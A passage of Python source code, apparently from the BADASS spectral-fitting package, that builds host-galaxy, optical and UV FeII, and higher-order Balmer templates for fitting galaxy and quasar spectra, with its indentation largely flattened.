fwhm_temp = 2.51 # FWHM resolution of eMILES in Å
# Open a fits file
hdu = fits.open(temp[0])
ssp = hdu[0].data
h = hdu[0].header
hdu.close()
lam_temp = np.array(h['CRVAL1'] + h['CDELT1']*np.arange(h['NAXIS1']))
mask = ((lam_temp>=(lam_gal[0]-100.0)) & (lam_temp<=(lam_gal[-1]+100.0)))
# Apply mask and get lamRange
ssp = ssp[mask]
lam_temp = lam_temp[mask]
lamRange_temp = [np.min(lam_temp), np.max(lam_temp)]
# Create templates array
sspNew = log_rebin(lamRange_temp, ssp, velscale=velscale)[0]
templates = np.empty((sspNew.size, len(host_options["age"])))
# Variable sigma
fwhm_gal_interp = np.interp(lam_temp, lam_gal, fwhm_gal)
fwhm_dif = np.sqrt((fwhm_gal_interp**2 - fwhm_temp**2).clip(0))
sigma = fwhm_dif/2.355/h['CDELT1'] # Sigma difference in pixels
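	# Each SSP template is smoothed with a wavelength-dependent Gaussian kernel so that its
	# effective resolution matches the interpolated instrumental resolution of the data.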
#
for j, age in enumerate(host_options["age"]):
hdu = fits.open(temp[np.where(ages==age)[0][0]])
ssp = hdu[0].data
ssp = ssp[mask]
ssp = gaussian_filter1d(ssp, sigma) # perform convolution with variable sigma
sspNew,loglam_temp,velscale_temp = log_rebin(lamRange_temp, ssp, velscale=velscale)#[0]
templates[:, j] = sspNew/np.median(sspNew) # Normalizes templates
hdu.close()
#
# Calculate npad and vsyst
c = 299792.458 # speed of light in km/s
vsyst = np.log(lam_temp[0]/lam_gal[0])*c # km/s
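	# vsyst accounts for the wavelength offset between the (padded) template grid and the data, so
	# that convolve_gauss_hermite aligns the convolved templates with lam_gal.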
ssp_fft, npad = template_rfft(templates) # we will use this throughout the code
#
# Pre-convolve the templates if the velocity and dispersion are to be constant during the fit;
# this reduces the number of convolution computations during the fit.
if (host_options["vel_const"]["bool"]==True) & (host_options["disp_const"]["bool"]==True):
host_vel = host_options["vel_const"]["val"]
host_disp = host_options["disp_const"]["val"]
conv_host = convolve_gauss_hermite(ssp_fft,npad,float(velscale),\
[host_vel, host_disp],np.shape(lam_gal)[0],velscale_ratio=1,sigma_diff=0,vsyst=vsyst)
host_template = conv_host
#
# fig = plt.figure(figsize=(18,7))
# ax1 = fig.add_subplot(1,1,1)
# ax1.plot(lam_gal,host_template.reshape(-1))
# plt.tight_layout()
#
# If velocity and dispersion of the host template are free parameters, then BADASS passes
# the fft of the host template(s) to the fit model for convolution during the fit.
elif (host_options["vel_const"]["bool"]==False) | (host_options["disp_const"]["bool"]==False):
host_template = (ssp_fft, npad, vsyst)
#
# fig = plt.figure(figsize=(18,7))
# ax1 = fig.add_subplot(1,1,1)
# for i in range(np.shape(templates)[1]):
# ax1.plot(np.exp(loglam_temp),templates[:,i])
# plt.tight_layout()
#
return host_template
##################################################################################
#### Optical FeII Templates ##############################################################
def initialize_opt_feii(lam_gal, opt_feii_options, fwhm_gal,fit_mask, velscale):
"""
Generate FeII templates. Options:
'VC04' : Veron-Cetty et al. (2004) template, which utilizes a single broad
and single narrow line template with fixed relative intensities.
One can choose to fix FWHM and VOFF for each, and only vary
amplitudes (2 free parameters), or vary amplitude, FWHM, and VOFF
for each template (6 free parameters)
'K10' : Kovacevic et al. (2010) template, which treats the F, S, and G line
groups as independent templates (each amplitude is a free parameter)
and whose relative intensities are temperature dependent (1 free
			 parameter). There are additional lines from IZe1 that only vary in
amplitude. All 4 line groups share the same FWHM and VOFF, for a
total of 7 free parameters. This template is only recommended
for objects with very strong FeII emission, for which the LOSVD
cannot be determined at all.
"""
if (opt_feii_options['opt_template']['type']=='VC04'):
# Load the data into Pandas DataFrames
df_br = pd.read_csv("badass_data_files/feii_templates/veron-cetty_2004/VC04_br_feii_template.csv")
df_na = pd.read_csv("badass_data_files/feii_templates/veron-cetty_2004/VC04_na_feii_template.csv")
# Generate a new grid with the original resolution, but the size of the fitting region
dlam_feii = df_br["angstrom"].to_numpy()[1]-df_br["angstrom"].to_numpy()[0] # angstroms
		npad = 100 # angstroms
lam_feii = np.arange(np.min(lam_gal)-npad, np.max(lam_gal)+npad,dlam_feii) # angstroms
# Interpolate the original template onto the new grid
interp_ftn_br = interp1d(df_br["angstrom"].to_numpy(),df_br["flux"].to_numpy(),kind='linear',bounds_error=False,fill_value=(0.0,0.0))
interp_ftn_na = interp1d(df_na["angstrom"].to_numpy(),df_na["flux"].to_numpy(),kind='linear',bounds_error=False,fill_value=(0.0,0.0))
spec_feii_br = interp_ftn_br(lam_feii)
spec_feii_na = interp_ftn_na(lam_feii)
# Convolve templates to the native resolution of SDSS
fwhm_feii = 1.0 # templates were created with 1.0 FWHM resolution
fwhm_gal_interp = np.interp(lam_feii, lam_gal, fwhm_gal)
fwhm_diff = np.sqrt((fwhm_gal_interp**2 - fwhm_feii**2).clip(0))
sigma = fwhm_diff/2.3548/dlam_feii # Sigma difference in pixels
spec_feii_br = gaussian_filter1d(spec_feii_br, sigma)
spec_feii_na = gaussian_filter1d(spec_feii_na, sigma)
# log-rebin the spectrum to same velocity scale as the input galaxy
lamRange_feii = [np.min(lam_feii), np.max(lam_feii)]
spec_feii_br_new, loglam_feii, velscale_feii = log_rebin(lamRange_feii, spec_feii_br, velscale=velscale)#[0]
spec_feii_na_new, loglam_feii, velscale_feii = log_rebin(lamRange_feii, spec_feii_na, velscale=velscale)#[0]
#
# fig = plt.figure(figsize=(18,7))
# ax1 = fig.add_subplot(1,1,1)
# ax1.plot(np.exp(loglam_feii),spec_feii_br_new, linewidth=0.5)
# ax1.plot(np.exp(loglam_feii),spec_feii_na_new, linewidth=0.5)
# plt.tight_layout()
#
# Pre-compute FFT of templates, since they do not change (only the LOSVD and convolution changes)
br_opt_feii_fft, npad = template_rfft(spec_feii_br_new)
na_opt_feii_fft, npad = template_rfft(spec_feii_na_new)
		# The FeII template wavelength grid extends 100 A beyond the fitting region, so we compute
		# a systemic velocity offset (vsyst) to align the convolved templates with the input galaxy.
c = 299792.458 # speed of light in km/s
vsyst = np.log(lam_feii[0]/lam_gal[0])*c
# If opt_fwhm_const=True AND opt_voff_const=True, we preconvolve the templates so we don't have to
# during the fit
if (opt_feii_options["opt_fwhm_const"]["bool"]==True) & (opt_feii_options["opt_voff_const"]["bool"]==True):
br_fwhm = opt_feii_options["opt_fwhm_const"]["br_opt_feii_val"]
na_fwhm = opt_feii_options["opt_fwhm_const"]["na_opt_feii_val"]
#
br_voff = opt_feii_options["opt_voff_const"]["br_opt_feii_val"]
na_voff = opt_feii_options["opt_voff_const"]["na_opt_feii_val"]
#
br_conv_temp = convolve_gauss_hermite(br_opt_feii_fft, npad, float(velscale),\
[br_voff, br_fwhm/2.3548], lam_gal.shape[0],
velscale_ratio=1, sigma_diff=0, vsyst=vsyst)
na_conv_temp = convolve_gauss_hermite(na_opt_feii_fft, npad, float(velscale),\
[na_voff, na_fwhm/2.3548], lam_gal.shape[0],
velscale_ratio=1, sigma_diff=0, vsyst=vsyst)
#
# fig = plt.figure(figsize=(18,7))
# ax1 = fig.add_subplot(1,1,1)
# ax1.plot(lam_gal,br_conv_temp, linewidth=0.5)
# ax1.plot(lam_gal,na_conv_temp, linewidth=0.5)
# plt.tight_layout()
#
opt_feii_templates = (br_conv_temp, na_conv_temp)
elif (opt_feii_options["opt_fwhm_const"]["bool"]==False) | (opt_feii_options["opt_voff_const"]["bool"]==False):
# We return a tuple consisting of the FFT of the broad and narrow templates, npad, and vsyst,
# which are needed for the convolution.
opt_feii_templates =(br_opt_feii_fft, na_opt_feii_fft, npad, vsyst)
return opt_feii_templates
elif (opt_feii_options['opt_template']['type']=='K10'):
		# The procedure for the K10 templates is slightly different since their relative intensities
		# are temperature dependent. We must create a Gaussian emission line for each individual line,
		# and store them as an array, for each of the F, S, G, and Z transitions. We treat each transition
		# as a group of templates, which will be convolved together, but whose relative intensities are
		# calculated separately.
def gaussian_angstroms(x, center, amp, fwhm, voff):
sigma = fwhm/2.3548
x = x.reshape((len(x),1))
g = amp*np.exp(-0.5*(x-(center))**2/(sigma)**2) # construct gaussian
g = np.sum(g,axis=1)
# Normalize to 1
# g = g/np.max(g)
			# Make sure edges of gaussian are zero to avoid weird things
# g[g<1.0e-6] = 0.0
# Replace the ends with the same value
g[0] = g[1]
g[-1] = g[-2]
return g
#
# Read in template data
F_trans_df = pd.read_csv('badass_data_files/feii_templates/kovacevic_2010/K10_F_transitions.csv')
S_trans_df = pd.read_csv('badass_data_files/feii_templates/kovacevic_2010/K10_S_transitions.csv')
G_trans_df = pd.read_csv('badass_data_files/feii_templates/kovacevic_2010/K10_G_transitions.csv')
Z_trans_df = pd.read_csv('badass_data_files/feii_templates/kovacevic_2010/K10_Z_transitions.csv')
# Generate a high-resolution wavelength scale that is universal to all transitions
fwhm = 1.0 # Angstroms
dlam_feii = 0.1 # linear spacing in Angstroms
npad = 100
lam_feii = np.arange(np.min(lam_gal)-npad, np.max(lam_gal)+npad, dlam_feii)
lamRange_feii = [np.min(lam_feii), np.max(lam_feii)]
# Get size of output log-rebinned spectrum
F = gaussian_angstroms(lam_feii, F_trans_df["wavelength"].to_numpy()[0], 1.0, fwhm, 0.0)
new_size, loglam_feii, velscale_feii = log_rebin(lamRange_feii, F, velscale=velscale)
# Create storage arrays for each emission line of each transition
F_templates = np.empty(( len(new_size), len(F_trans_df['wavelength'].to_numpy()) ))
S_templates = np.empty(( len(new_size), len(S_trans_df['wavelength'].to_numpy()) ))
G_templates = np.empty(( len(new_size), len(G_trans_df['wavelength'].to_numpy()) ))
Z_templates = np.empty(( len(new_size), len(Z_trans_df['wavelength'].to_numpy()) ))
		# Generate templates with an amplitude of 1.0
for i in range(np.shape(F_templates)[1]):
F = gaussian_angstroms(lam_feii, F_trans_df["wavelength"].to_numpy()[i], 1.0, fwhm, 0.0)
new_F = log_rebin(lamRange_feii, F, velscale=velscale)[0]
F_templates[:,i] = new_F/np.max(new_F)
for i in range(np.shape(S_templates)[1]):
S = gaussian_angstroms(lam_feii, S_trans_df["wavelength"].to_numpy()[i], 1.0, fwhm, 0.0)
new_S = log_rebin(lamRange_feii, S, velscale=velscale)[0]
S_templates[:,i] = new_S/np.max(new_S)
for i in range(np.shape(G_templates)[1]):
G = gaussian_angstroms(lam_feii, G_trans_df["wavelength"].to_numpy()[i], 1.0, fwhm, 0.0)
new_G = log_rebin(lamRange_feii, G, velscale=velscale)[0]
G_templates[:,i] = new_G/np.max(new_G)
for i in range(np.shape(Z_templates)[1]):
Z = gaussian_angstroms(lam_feii, Z_trans_df["wavelength"].to_numpy()[i], 1.0, fwhm, 0.0)
new_Z = log_rebin(lamRange_feii, Z, velscale=velscale)[0]
Z_templates[:,i] = new_Z/np.max(new_Z)
# Pre-compute the FFT for each transition
F_trans_fft, F_trans_npad = template_rfft(F_templates)
S_trans_fft, S_trans_npad = template_rfft(S_templates)
G_trans_fft, G_trans_npad = template_rfft(G_templates)
Z_trans_fft, Z_trans_npad = template_rfft(Z_templates)
npad = F_trans_npad
c = 299792.458 # speed of light in km/s
vsyst = np.log(lam_feii[0]/lam_gal[0])*c
# If opt_fwhm_const=True AND opt_voff_const=True, we preconvolve the templates so we don't have to
# during the fit
if (opt_feii_options["opt_fwhm_const"]["bool"]==True) & (opt_feii_options["opt_voff_const"]["bool"]==True):
feii_fwhm = opt_feii_options["opt_fwhm_const"]["opt_feii_val"]
#
feii_voff = opt_feii_options["opt_voff_const"]["opt_feii_val"]
#
f_conv_temp = convolve_gauss_hermite(F_trans_fft, F_trans_npad, float(velscale),\
[feii_voff, feii_fwhm/2.3548], lam_gal.shape[0],
velscale_ratio=1, sigma_diff=0, vsyst=vsyst)
s_conv_temp = convolve_gauss_hermite(S_trans_fft, S_trans_npad, float(velscale),\
[feii_voff, feii_fwhm/2.3548], lam_gal.shape[0],
velscale_ratio=1, sigma_diff=0, vsyst=vsyst)
g_conv_temp = convolve_gauss_hermite(G_trans_fft, G_trans_npad, float(velscale),\
[feii_voff, feii_fwhm/2.3548], lam_gal.shape[0],
velscale_ratio=1, sigma_diff=0, vsyst=vsyst)
z_conv_temp = convolve_gauss_hermite(Z_trans_fft, Z_trans_npad, float(velscale),\
[feii_voff, feii_fwhm/2.3548], lam_gal.shape[0],
velscale_ratio=1, sigma_diff=0, vsyst=vsyst)
#
opt_feii_templates = (f_conv_temp, F_trans_df['wavelength'].to_numpy() ,F_trans_df['gf'].to_numpy(), F_trans_df['E2_J'].to_numpy(),
s_conv_temp, S_trans_df['wavelength'].to_numpy() ,S_trans_df['gf'].to_numpy(), S_trans_df['E2_J'].to_numpy(),
g_conv_temp, G_trans_df['wavelength'].to_numpy() ,G_trans_df['gf'].to_numpy(), G_trans_df['E2_J'].to_numpy(),
z_conv_temp, Z_trans_df['rel_int'].to_numpy()
)
#
elif (opt_feii_options["opt_fwhm_const"]["bool"]==False) | (opt_feii_options["opt_voff_const"]["bool"]==False):
opt_feii_templates = (F_trans_fft, F_trans_df['wavelength'].to_numpy() ,F_trans_df['gf'].to_numpy(), F_trans_df['E2_J'].to_numpy(),
S_trans_fft, S_trans_df['wavelength'].to_numpy() ,S_trans_df['gf'].to_numpy(), S_trans_df['E2_J'].to_numpy(),
G_trans_fft, G_trans_df['wavelength'].to_numpy() ,G_trans_df['gf'].to_numpy(), G_trans_df['E2_J'].to_numpy(),
Z_trans_fft, Z_trans_df['rel_int'].to_numpy(),
npad, vsyst
)
# Return a list of arrays which will be unpacked during the fitting process
return opt_feii_templates
#### Optical FeII Template #########################################################
def VC04_opt_feii_template(p, lam_gal, opt_feii_templates, opt_feii_options, velscale):
# Unpack opt_feii_templates
# Parse FeII options
#
if (opt_feii_options['opt_amp_const']['bool']==False): # if amp not constant
na_opt_feii_amp = p['NA_OPT_FEII_AMP']
br_opt_feii_amp = p['BR_OPT_FEII_AMP']
elif (opt_feii_options['opt_amp_const']['bool']==True): # if amp constant
na_opt_feii_amp = opt_feii_options['opt_amp_const']['na_opt_feii_val']
br_opt_feii_amp = opt_feii_options['opt_amp_const']['br_opt_feii_val']
#
if (opt_feii_options['opt_fwhm_const']['bool']==False): # if amp not constant
na_opt_feii_fwhm = p['NA_OPT_FEII_FWHM']
br_opt_feii_fwhm = p['BR_OPT_FEII_FWHM']
elif (opt_feii_options['opt_fwhm_const']['bool']==True): # if amp constant
na_opt_feii_fwhm = opt_feii_options['opt_fwhm_const']['na_opt_feii_val']
br_opt_feii_fwhm = opt_feii_options['opt_fwhm_const']['br_opt_feii_val']
if na_opt_feii_fwhm<=0.01: na_opt_feii_fwhm = 0.01
if br_opt_feii_fwhm<=0.01: br_opt_feii_fwhm = 0.01
#
if (opt_feii_options['opt_voff_const']['bool']==False): # if amp not constant
na_opt_feii_voff = p['NA_OPT_FEII_VOFF']
br_opt_feii_voff = p['BR_OPT_FEII_VOFF']
elif (opt_feii_options['opt_voff_const']['bool']==True): # if amp constant
na_opt_feii_voff = opt_feii_options['opt_voff_const']['na_opt_feii_val']
br_opt_feii_voff = opt_feii_options['opt_voff_const']['br_opt_feii_val']
#
if (opt_feii_options["opt_fwhm_const"]["bool"]==True) & (opt_feii_options["opt_voff_const"]["bool"]==True):
br_conv_temp, na_conv_temp = opt_feii_templates
		# Templates are already convolved, so just scale by the amplitude
# br_opt_feii_template = br_conv_temp/np.max(br_conv_temp) * br_opt_feii_amp
# na_opt_feii_template = na_conv_temp/np.max(na_conv_temp) * na_opt_feii_amp
br_opt_feii_template = br_conv_temp * br_opt_feii_amp
na_opt_feii_template = na_conv_temp * na_opt_feii_amp
br_opt_feii_template = br_opt_feii_template.reshape(-1)
na_opt_feii_template = na_opt_feii_template.reshape(-1)
# Set fitting region outside of template to zero to prevent convolution loops
		br_opt_feii_template[(lam_gal < 3400) | (lam_gal > 7200)] = 0
		na_opt_feii_template[(lam_gal < 3400) | (lam_gal > 7200)] = 0
#
# print(br_opt_feii_amp,na_opt_feii_amp)
# fig = plt.figure(figsize=(18,7))
# ax1 = fig.add_subplot(1,1,1)
# ax1.plot(lam_gal,na_opt_feii_template, linewidth=0.5)
# ax1.plot(lam_gal,br_opt_feii_template, linewidth=0.5)
# plt.tight_layout()
# sys.exit()
#
elif (opt_feii_options["opt_fwhm_const"]["bool"]==False) | (opt_feii_options["opt_voff_const"]["bool"]==False):
br_opt_feii_fft, na_opt_feii_fft, npad, vsyst = opt_feii_templates
br_conv_temp = convolve_gauss_hermite(br_opt_feii_fft, npad, float(velscale),
[br_opt_feii_voff, br_opt_feii_fwhm/2.3548], lam_gal.shape[0],
velscale_ratio=1, sigma_diff=0, vsyst=vsyst)
#
na_conv_temp = convolve_gauss_hermite(na_opt_feii_fft, npad, float(velscale),
[na_opt_feii_voff, na_opt_feii_fwhm/2.3548], lam_gal.shape[0],
velscale_ratio=1, sigma_diff=0, vsyst=vsyst)
# Re-normalize to 1
# br_conv_temp = br_conv_temp/np.max(br_conv_temp)
# na_conv_temp = na_conv_temp/np.max(na_conv_temp)
		# Multiply by amplitude
br_opt_feii_template = br_opt_feii_amp * br_conv_temp
na_opt_feii_template = na_opt_feii_amp * na_conv_temp
# Reshape
br_opt_feii_template = br_opt_feii_template.reshape(-1)
na_opt_feii_template = na_opt_feii_template.reshape(-1)
# Set fitting region outside of template to zero to prevent convolution loops
		br_opt_feii_template[(lam_gal < 3400) | (lam_gal > 7200)] = 0
		na_opt_feii_template[(lam_gal < 3400) | (lam_gal > 7200)] = 0
return br_opt_feii_template, na_opt_feii_template
####################################################################################
#### UV Iron Template ##############################################################
def initialize_uv_iron(lam_gal, feii_options, fwhm_gal,fit_mask, velscale):
"""
Generate UV Iron template.
"""
# Load the data into Pandas DataFrames
# df_uviron = pd.read_csv("badass_data_files/feii_templates/vestergaard-wilkes_2001/VW01_UV_B_47_191.csv") # UV B+47+191
df_uviron = pd.read_csv("badass_data_files/feii_templates/vestergaard-wilkes_2001/VW01_UV_B.csv") # UV B only
# Generate a new grid with the original resolution, but the size of the fitting region
dlam_uviron = df_uviron["angstrom"].to_numpy()[1]-df_uviron["angstrom"].to_numpy()[0] # angstroms
	npad = 100 # angstroms
lam_uviron = np.arange(np.min(lam_gal)-npad, np.max(lam_gal)+npad,dlam_uviron) # angstroms
# Interpolate the original template onto the new grid
interp_ftn_uv = interp1d(df_uviron["angstrom"].to_numpy(),df_uviron["flux"].to_numpy(),kind='linear',bounds_error=False,fill_value=(1.e-10,1.e-10))
spec_uviron = interp_ftn_uv(lam_uviron)
# log-rebin the spectrum to same velocity scale as the input galaxy
lamRange_uviron = [np.min(lam_uviron), np.max(lam_uviron)]
spec_uviron_new, loglam_uviron, velscale_uviron = log_rebin(lamRange_uviron, spec_uviron, velscale=velscale)#[0]
# Pre-compute FFT of templates, since they do not change (only the LOSVD and convolution changes)
uv_iron_fft, npad = template_rfft(spec_uviron_new)
	# The UV iron template wavelength grid extends 100 A beyond the fitting region, so we compute
	# a systemic velocity offset (vsyst) to align the convolved template with the input galaxy.
c = 299792.458 # speed of light in km/s
vsyst = np.log(lam_uviron[0]/lam_gal[0])*c
# We return a tuple consisting of the FFT of the broad and narrow templates, npad, and vsyst,
# which are needed for the convolution.
return (uv_iron_fft, npad, vsyst)
####################################################################################
#### Balmer Template ###############################################################
def initialize_balmer(lam_gal, balmer_options, fwhm_gal,fit_mask, velscale):
# Import the template for the higher-order balmer lines (7 <= n <= 500)
# df = pd.read_csv("badass_data_files/balmer_template/higher_order_balmer.csv")
df = pd.read_csv("badass_data_files/balmer_template/higher_order_balmer_n8_500.csv")
# Generate a new grid with the original resolution, but the size of the fitting region
dlam_balmer = df["angstrom"].to_numpy()[1]-df["angstrom"].to_numpy()[0] # angstroms
npad = 100 # angstroms
lam_balmer = np.arange(np.min(lam_gal)-npad, np.max(lam_gal)+npad,dlam_balmer) # angstroms
# Interpolate the original template onto the new grid
interp_ftn_balmer = interp1d(df["angstrom"].to_numpy(),df["flux"].to_numpy(),kind='linear',bounds_error=False,fill_value=(1.e-10,1.e-10))
spec_high_balmer = interp_ftn_balmer(lam_balmer)
# Calculate the difference in instrumental dispersion between SDSS and the template
lamRange_balmer = [np.min(lam_balmer), np.max(lam_balmer)]
fwhm_balmer = 1.0
fwhm_gal_interp = np.interp(lam_balmer, lam_gal, fwhm_gal)
fwhm_diff = np.sqrt((fwhm_gal_interp**2 - fwhm_balmer**2).clip(0))
sigma = fwhm_diff/2.3548/dlam_balmer # Sigma difference in pixels
# Convolve the Balmer template to the SDSS resolution
spec_high_balmer = gaussian_filter1d(spec_high_balmer, sigma)
# Log-rebin to same velocity scale as galaxy
spec_high_balmer_new, loglam_balmer, velscale_balmer = log_rebin(lamRange_balmer, spec_high_balmer, velscale=velscale)#[0]
if (np.sum(spec_high_balmer_new)>0):
# Normalize to 1
spec_high_balmer_new = spec_high_balmer_new/np.max(spec_high_balmer_new)
# Package the wavelength vector and template
balmer_template = (np.exp(loglam_balmer), spec_high_balmer_new, velscale_balmer)
return balmer_template
####################################################################################
def get_fwhm_res(fwhm_gal_ftn,line_center,line_voff):
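# Convert the wavelength-dependent FWHM resolution (in angstroms), evaluated at the
# velocity-shifted line center, into a FWHM resolution in km/s.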
c = 299792.458
fwhm_res = (fwhm_gal_ftn(line_center +
(line_voff*line_center/c))/(line_center +
(line_voff*line_center/c))*c)
return fwhm_res
####################################################################################
def K10_opt_feii_template(p, lam_gal, opt_feii_templates, opt_feii_options, velscale):
"""
Constructs a Kovacevic et al. (2010) FeII template using a series of Gaussians and ensures
no lines are created at the edges of the fitting region.
"""
# Parse FeII options
if (opt_feii_options['opt_amp_const']['bool']==False): # if amp not constant
f_feii_amp = p['OPT_FEII_F_AMP']
s_feii_amp = p['OPT_FEII_S_AMP']
g_feii_amp = p['OPT_FEII_G_AMP']
z_feii_amp = p['OPT_FEII_Z_AMP']
elif (opt_feii_options['opt_amp_const']['bool']==True): # if amp constant
f_feii_amp = opt_feii_options['opt_amp_const']['f_feii_val']
s_feii_amp = opt_feii_options['opt_amp_const']['s_feii_val']
g_feii_amp = opt_feii_options['opt_amp_const']['g_feii_val']
z_feii_amp = opt_feii_options['opt_amp_const']['z_feii_val']
#
if (opt_feii_options['opt_fwhm_const']['bool']==False): # if fwhm not constant
opt_feii_fwhm = p['OPT_FEII_FWHM']
elif (opt_feii_options['opt_fwhm_const']['bool']==True): # if fwhm constant
opt_feii_fwhm = opt_feii_options['opt_fwhm_const']['opt_feii_val']
if opt_feii_fwhm<= 0.01: opt_feii_fwhm = 0.01
#
if (opt_feii_options['opt_voff_const']['bool']==False): # if voff not constant
opt_feii_voff = p['OPT_FEII_VOFF']
elif (opt_feii_options['opt_voff_const']['bool']==True): # if voff constant
opt_feii_voff = opt_feii_options['opt_voff_const']['opt_feii_val']
#
if (opt_feii_options['opt_temp_const']['bool']==False): # if temp not constant
opt_feii_temp = p['OPT_FEII_TEMP']
elif (opt_feii_options['opt_temp_const']['bool']==True): # if temp constant
opt_feii_temp = opt_feii_options['opt_temp_const']['opt_feii_val']
if (opt_feii_options["opt_fwhm_const"]["bool"]==True) & (opt_feii_options["opt_voff_const"]["bool"]==True):
#
# Unpack tables for each template
f_conv_temp, f_feii_center, f_feii_gf, f_feii_e2 = (opt_feii_templates[0], opt_feii_templates[1], opt_feii_templates[2], opt_feii_templates[3])
s_conv_temp, s_feii_center, s_feii_gf, s_feii_e2 = (opt_feii_templates[4], opt_feii_templates[5], opt_feii_templates[6], opt_feii_templates[7])
g_conv_temp, g_feii_center, g_feii_gf, g_feii_e2 = (opt_feii_templates[8], opt_feii_templates[9], opt_feii_templates[10], opt_feii_templates[11])
z_conv_temp, z_feii_rel_int = (opt_feii_templates[12], opt_feii_templates[13])
# F-template
# Normalize amplitudes to 1
f_norm = np.array([np.max(f_conv_temp[:,i]) for i in range(np.shape(f_conv_temp)[1])])
f_norm[f_norm<1.e-6] = 1.0
f_conv_temp = f_conv_temp/f_norm
# Calculate temperature dependent relative intensities
f_feii_rel_int = calculate_k10_rel_int("F",f_feii_center, f_feii_gf, f_feii_e2, f_feii_amp, opt_feii_temp)
# Multiply by relative intensities
f_conv_temp = f_conv_temp * f_feii_rel_int
# Sum templates along rows
f_template = np.sum(f_conv_temp, axis=1)
f_template[(lam_gal < 4472) | (lam_gal > 5147)] = 0 # zero outside the template's wavelength coverage
# S-template
# Normalize amplitudes to 1
s_norm = np.array([np.max(s_conv_temp[:,i]) for i in range(np.shape(s_conv_temp)[1])])
s_norm[s_norm<1.e-6] = 1.0
s_conv_temp = s_conv_temp/s_norm
# Calculate temperature dependent relative intensities
s_feii_rel_int = calculate_k10_rel_int("S",s_feii_center, s_feii_gf, s_feii_e2, s_feii_amp, opt_feii_temp)
# Multiply by relative intensities
s_conv_temp = s_conv_temp * s_feii_rel_int
# Sum templates along rows
s_template = np.sum(s_conv_temp, axis=1)
s_template[(lam_gal < 4731) | (lam_gal > 5285)] = 0 # zero outside the template's wavelength coverage
# G-template
# Normalize amplitudes to 1
g_norm = np.array([np.max(g_conv_temp[:,i]) for i in range(np.shape(g_conv_temp)[1])])
g_norm[g_norm<1.e-6] = 1.0
g_conv_temp = g_conv_temp/g_norm
# Calculate temperature dependent relative intensities
g_feii_rel_int = calculate_k10_rel_int("G",g_feii_center, g_feii_gf, g_feii_e2, g_feii_amp, opt_feii_temp)
# Multiply by relative intensities
g_conv_temp = g_conv_temp * g_feii_rel_int
# Sum templates along rows
g_template = np.sum(g_conv_temp, axis=1)
g_template[(lam_gal < 4472) | (lam_gal > 5147)] = 0 # zero outside the template's wavelength coverage
# Z template
# Normalize amplitudes to 1
z_norm = np.array([np.max(z_conv_temp[:,i]) for i in range(np.shape(z_conv_temp)[1])])
z_norm[z_norm<1.e-6] = 1.0
z_conv_temp = z_conv_temp/z_norm
# Multiply by relative intensities
z_conv_temp = z_conv_temp * z_feii_rel_int
# Sum templates along rows
z_template = np.sum(z_conv_temp, axis=1)
# Multiply by FeII amplitude
z_template = z_template * z_feii_amp
z_template[(lam_gal < 4418) | (lam_gal > 5428)] = 0 # zero outside the template's wavelength coverage
#
# fig = plt.figure(figsize=(18,7))
# ax1 = fig.add_subplot(1,1,1)
# ax1.plot(lam_gal,f_template, linewidth=0.5)
# ax1.plot(lam_gal,s_template, linewidth=0.5)
# ax1.plot(lam_gal,g_template, linewidth=0.5)
# ax1.plot(lam_gal,z_template, linewidth=0.5)
# plt.tight_layout()
# sys.exit()
#
elif (opt_feii_options["opt_fwhm_const"]["bool"]==False) | (opt_feii_options["opt_voff_const"]["bool"]==False):
#
# Unpack tables for each template
f_feii_fft, f_feii_center, f_feii_gf, f_feii_e2 = (opt_feii_templates[0], opt_feii_templates[1], opt_feii_templates[2], opt_feii_templates[3])
s_feii_fft, s_feii_center, s_feii_gf, s_feii_e2 = (opt_feii_templates[4], opt_feii_templates[5], opt_feii_templates[6], opt_feii_templates[7])
g_feii_fft, g_feii_center, g_feii_gf, g_feii_e2 = (opt_feii_templates[8], opt_feii_templates[9], opt_feii_templates[10], opt_feii_templates[11])
z_feii_fft, z_feii_rel_int = (opt_feii_templates[12], opt_feii_templates[13])
npad = opt_feii_templates[14]
vsyst = opt_feii_templates[15]
# F-template
# Perform the convolution
f_conv_temp = convolve_gauss_hermite(f_feii_fft, npad, float(velscale),\
[opt_feii_voff, opt_feii_fwhm/2.3548], lam_gal.shape[0],
velscale_ratio=1, sigma_diff=0, vsyst=vsyst)
# Normalize amplitudes to 1
f_norm = np.array([np.max(f_conv_temp[:,i]) for i in range(np.shape(f_conv_temp)[1])])
f_norm[f_norm<1.e-6] = 1.0
f_conv_temp = f_conv_temp/f_norm
# Calculate temperature dependent relative intensities
f_feii_rel_int = calculate_k10_rel_int("F",f_feii_center, f_feii_gf, f_feii_e2, f_feii_amp, opt_feii_temp)
# Multiply by relative intensities
f_conv_temp = f_conv_temp * f_feii_rel_int
# Sum templates along rows
f_template = np.sum(f_conv_temp, axis=1)
f_template[(lam_gal < 4472) | (lam_gal > 5147)] = 0 # zero outside the template's wavelength coverage
# S-template
# Perform the convolution
s_conv_temp = convolve_gauss_hermite(s_feii_fft, npad, float(velscale),\
[opt_feii_voff, opt_feii_fwhm/2.3548], lam_gal.shape[0],
velscale_ratio=1, sigma_diff=0, vsyst=vsyst)
# Normalize amplitudes to 1
s_norm = np.array([np.max(s_conv_temp[:,i]) for i in range(np.shape(s_conv_temp)[1])])
s_norm[s_norm<1.e-6] = 1.0
s_conv_temp = s_conv_temp/s_norm
# Calculate temperature dependent relative intensities
s_feii_rel_int = calculate_k10_rel_int("S",s_feii_center, s_feii_gf, s_feii_e2, s_feii_amp, opt_feii_temp)
# Multiply by relative intensities
s_conv_temp = s_conv_temp * s_feii_rel_int
# Sum templates along rows
s_template = np.sum(s_conv_temp, axis=1)
s_template[(lam_gal < 4731) | (lam_gal > 5285)] = 0 # zero outside the template's wavelength coverage
# G-template
# Perform the convolution
g_conv_temp = convolve_gauss_hermite(g_feii_fft, npad, float(velscale),\
[opt_feii_voff, opt_feii_fwhm/2.3548], lam_gal.shape[0],
velscale_ratio=1, sigma_diff=0, vsyst=vsyst)
# Normalize amplitudes to 1
g_norm = np.array([np.max(g_conv_temp[:,i]) for i in range(np.shape(g_conv_temp)[1])])
g_norm[g_norm<1.e-6] = 1.0
g_conv_temp = g_conv_temp/g_norm
# Calculate temperature dependent relative intensities
g_feii_rel_int = calculate_k10_rel_int("G",g_feii_center, g_feii_gf, g_feii_e2, g_feii_amp, opt_feii_temp)
# Multiply by relative intensities
g_conv_temp = g_conv_temp * g_feii_rel_int
# Sum templates along rows
g_template = np.sum(g_conv_temp, axis=1)
g_template[(lam_gal < 4472) | (lam_gal > 5147)] = 0 # zero outside the template's wavelength coverage
# Z template
# Perform the convolution
z_conv_temp = convolve_gauss_hermite(z_feii_fft, npad, float(velscale),\
